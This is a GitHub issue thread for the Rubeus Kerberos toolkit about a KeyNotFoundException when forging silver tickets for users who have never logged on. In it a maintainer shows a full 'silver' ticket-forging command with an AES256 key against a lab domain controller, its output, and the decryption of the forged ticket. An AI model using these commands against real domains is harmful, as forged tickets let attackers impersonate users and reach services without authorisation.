### ISSUE TITLE
Silver ticket creation fails if badpwdcount and/or logoncount are 0

### ISSUE THREAD

**Issue by l0ss** [GhostPack/Rubeus#103]
In lines 464 and 465 of ForgeTicket.cs:

Seems like these values don't end up in the userObject dictionary if the user has never logged on, which causes:

System.Collections.Generic.KeyNotFoundException: The given key was not present in the dictionary.
   at System.ThrowHelper.ThrowKeyNotFoundException()
   at System.Collections.Generic.Dictionary`2.get_Item(TKey key)
   at Rubeus.ForgeTickets.ForgeTicket(String user, String sname, Byte[] serviceKey, KERB_ETYPE etype, Byte[] krbKey, KERB_CHECKSUM_ALGORITHM krbeType, Boolean ldap, String ldapuser, String ldappassword, String sid, String domain, String netbiosName, String domainController, TicketFlags flags, Nullable`1 startTime, Nullable`1 rangeEnd, String rangeInterval, Nullable`1 authTime, String endTime, String renewTill, Nullable`1 id, String groups, String sids, String displayName, Nullable`1 logonCount, Nullable`1 badPwdCount, Nullable`1 lastLogon, Nullable`1 logoffTime, Nullable`1 pwdLastSet, Nullable`1 maxPassAge, Nullable`1 minPassAge, Nullable`1 pGid, String homeDir, String homeDrive, String profilePath, String scriptPath, String resourceGroupSid, List`1 resourceGroups, PacUserAccountControl uac, String outfile, Boolean ptt, Boolean printcmd, String cName, String cRealm, String s4uProxyTarget, String s4uTransitedServices, Boolean includeAuthData)
   at Rubeus.Commands.Silver.Execute(Dictionary`2 arguments)
   at Rubeus.Domain.CommandCollection.ExecuteCommand(String commandName, Dictionary`2 arguments)
   at Rubeus.Program.MainExecute(String commandName, Dictionary`2 parsedArgs)

**Comment by l0ss** [comment]
also seems to cause trouble on 466+ in the lastlogon, lastlogoff, and pwdlastset checks - getting 'key not present in the dictionary' if the user has never logged on.

**Comment by 0xe7** [comment]
I can add checks for these but I just created a new user to test this:

```
PS C:\Users\Charlie> get-domainuser new.user


logoncount            : 0
badpasswordtime       : 01/01/1601 00:00:00
distinguishedname     : CN=New User,OU=CustomOU,DC=internal,DC=zeroday,DC=lab
objectclass           : {top, person, organizationalPerson, user}
displayname           : New User
userprincipalname     : new.user@internal.zeroday.lab
samaccountname        : new.user
codepage              : 0
samaccounttype        : USER_OBJECT
accountexpires        : NEVER
countrycode           : 0
whenchanged           : 17/11/2021 06:28:49
instancetype          : 4
usncreated            : 791144
objectguid            : 4fd45553-8cfe-46a0-a682-cfdcb4ad11e7
sn                    : User
lastlogoff            : 01/01/1601 00:00:00
whencreated           : 17/11/2021 06:28:49
objectcategory        : CN=Person,CN=Schema,CN=Configuration,DC=internal,DC=zeroday,DC=lab
dscorepropagationdata : 01/01/1601 00:00:00
givenname             : New
usnchanged            : 791149
lastlogon             : 01/01/1601 00:00:00
badpwdcount           : 0
cn                    : New User
useraccountcontrol    : NORMAL_ACCOUNT
objectsid             : S-1-5-21-2042794111-3163024120-2630140754-1134
primarygroupid        : 513
pwdlastset            : 17/11/2021 06:28:49
name                  : New User
```

Those fields seem to be there and I seem to be able to create a silver ticket fine:
```
C:\temp>.\Rubeus.exe silver /user:new.user /service:ldap/idc1.internal.zeroday.lab /domain:internal.zeroday.lab /dc:idc1.internal.zeroday.lab /aes256:8276C9825289D317FF15A9D211B8339C3D07607E103DDEC13F0E133EB4DFF76A /ldap /nowrap

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.0

[*] Action: Build TGS

[*] Trying to query LDAP using LDAPS for user information on domain controller idc1.internal.zeroday.lab
[X] Error binding to LDAP server: The LDAP server is unavailable.
[!] LDAPS failed, retrying with plaintext LDAP.
[*] Searching path 'LDAP://idc1.internal.zeroday.lab/DC=internal,DC=zeroday,DC=lab' for '(samaccountname=new.user)'
[*] Retrieving domain policy information over LDAP from domain controller idc1.internal.zeroday.lab
[*] Searching path 'LDAP://idc1.internal.zeroday.lab/DC=internal,DC=zeroday,DC=lab' for '(|(objectsid=S-1-5-21-2042794111-3163024120-2630140754-513)(name={31B2F340-016D-11D2-945F-00C04FB984F9}))'
[*] Attempting to mount: \\idc1.internal.zeroday.lab\SYSVOL
[*] \\idc1.internal.zeroday.lab\SYSVOL successfully mounted
[*] Attempting to unmount: \\idc1.internal.zeroday.lab\SYSVOL
[*] \\idc1.internal.zeroday.lab\SYSVOL successfully unmounted
[*] Retrieving netbios name information over LDAP from domain controller idc1.internal.zeroday.lab
[*] Searching path 'LDAP://idc1.internal.zeroday.lab/CN=Configuration,DC=internal,DC=zeroday,DC=lab' for '(&(netbiosname=*)(dnsroot=internal.zeroday.lab))'
[*] Building PAC

[*] Domain         : INTERNAL.ZERODAY.LAB (INTERNAL)
[*] SID            : S-1-5-21-2042794111-3163024120-2630140754
[*] UserId         : 1134
[*] Groups         : 513
[*] ServiceKey     : 8276C9825289D317FF15A9D211B8339C3D07607E103DDEC13F0E133EB4DFF76A
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] KDCKey         : 8276C9825289D317FF15A9D211B8339C3D07607E103DDEC13F0E133EB4DFF76A
[*] KDCKeyType     : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] Service        : ldap
[*] Target         : idc1.internal.zeroday.lab

[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGS for 'new.user' to 'ldap/idc1.internal.zeroday.lab'

[*] AuthTime       : 17/11/2021 06:29:09
[*] StartTime      : 17/11/2021 06:29:09
[*] EndTime        : 17/11/2021 16:29:09
[*] RenewTill      : 24/11/2021 06:29:09

[*] base64(ticket.kirbi):

      doIFkTCCB...vZGF5LmxhYg==



C:\temp>.\Rubeus.exe describe /servicekey:8276C9825289D317FF15A9D211B8339C3D07607E103DDEC13F0E133EB4DFF76A /ticket:doIFkTCCBY2g...F5LmxhYg==

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.0


[*] Action: Describe Ticket


  ServiceName              :  ldap/idc1.internal.zeroday.lab
  ServiceRealm             :  INTERNAL.ZERODAY.LAB
  UserName                 :  new.user
  UserRealm                :  INTERNAL.ZERODAY.LAB
  StartTime                :  17/11/2021 06:29:09
  EndTime                  :  17/11/2021 16:29:09
  RenewTill                :  24/11/2021 06:29:09
  Flags                    :  pre_authent, renewable, forwardable
  KeyType                  :  aes256_cts_hmac_sha1
  Base64(key)              :  koVTkTGuzUTaQK4+KlDqwUAeZFtIbCXQwqBl+Zf3ra8=
[!] AES256 in use but no '/serviceuser' passed, unable to generate crackable hash.
  Decrypted PAC            :
    LogonInfo              :
      LogonTime            : 17/11/2021 06:29:09
      LogoffTime           :
      KickOffTime          :
      PasswordLastSet      : 17/11/2021 06:28:49
      PasswordCanChange    : 18/11/2021 06:28:49
      PasswordMustChange   : 19/11/2021 06:28:49
      EffectiveName        : new.user
      FullName             : New User
      LogonScript          :
      ProfilePath          :
      HomeDirectory        :
      HomeDirectoryDrive   :
      LogonCount           : 0
      BadPasswordCount     : 0
      UserId               : 1134
      PrimaryGroupId       : 513
      GroupCount           : 1
      Groups               : 513
      UserFlags            : (0) 0
      UserSessionKey       : 0000000000000000
      LogonServer          : IDC1
      LogonDomainName      : INTERNAL
      LogonDomainId        : S-1-5-21-2042794111-3163024120-2630140754
      UserAccountControl   : (16) NORMAL_ACCOUNT
      ExtraSIDCount        : 0
      ResourceGroupCount   : 0
    ClientName             :
      Client Id            : 17/11/2021 06:29:09
      Client Name          : new.user
    UpnDns                 :
      DNS Domain Name      : INTERNAL.ZERODAY.LAB
      UPN                  : new.user@internal.zeroday.lab
      Flags                : 0
    ServerChecksum         :
      Signature Type       : KERB_CHECKSUM_HMAC_SHA1_96_AES256
      Signature            : 77A37E35FE8E86E37FE3C022 (VALID)
    KDCChecksum            :
      Signature Type       : KERB_CHECKSUM_HMAC_SHA1_96_AES256
      Signature            : 9085A3FC7157A7B7F43D5F1C (UNVALIDATED)
    TicketChecksum         :
      Signature Type       : KERB_CHECKSUM_HMAC_SHA1_96_AES256
      Signature            : 6B385FCF687919454042EB80 (UNVALIDATED)
```

Out of interest, what domain functional level and DC version are you testing this against?

**Comment by 0xe7** [comment]
Could you try the `silver-fix` branch, I've added the extra checks that I think *should* resolve your issues but I have no way of testing as I can't reproduce.

**Comment by l0ss** [comment]
Thanks for the quick response!

I can't test this branch properly without a fix for #102 as that issue is hit first, but i decided to pull my finger out and just submit a PR with a fix myself. 

See #104. Cheers!
